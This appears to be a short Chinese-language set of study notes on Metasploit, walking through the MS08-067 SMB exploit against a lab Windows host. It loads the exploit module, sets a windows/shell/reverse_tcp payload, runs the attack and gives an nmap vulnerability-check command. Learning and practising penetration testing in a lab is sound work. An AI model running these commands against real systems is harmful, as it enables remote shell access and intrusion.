打开msfconsole
root@kali:~# msfconsole
当你想要查找某个特定的渗透攻击、辅助或攻击载荷模块时,使用search命令
msf > search ms08-067
找到攻击模块后,可以使用use命令加载模块
msf > use exploit/windows/smb/ms08_067_netapi
当已经进入某个模块后,使用show options 显示模块的参数
设置参数,set命令可以对某个参数进行设置(同时启用该参数),unset命令可以禁用相关参数
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.112.149
RHOST => 192.168.112.149
选择攻击载荷,使用show payloads查看与当前模块兼容的所有攻击载荷
msf exploit(windows/smb/ms08_067_netapi) > show payloads
设置攻击载荷set PAYLOAD 要使用的攻击载荷
msf exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
设置攻击目标系统的类型,攻击是否成功取决于目标Windows系统的版本,先查看所有的系统版本show targets
msf exploit(windows/smb/ms08_067_netapi) > show targets
可以用info查看某个模块的详细信息,使用info 加上模块的名字,如何已经选择某个模块,直接在该模块下输入info
msf exploit(windows/smb/ms08_067_netapi) > info
攻击命令exploit
msf exploit(windows/smb/ms08_067_netapi) >exploit
一次渗透攻击
使用nmap的扫描脚本进行漏洞检查是途径之一
root@wu:~# nmap -sT -A --script=smb-vuln-ms08-067 -PO 192.168.112.146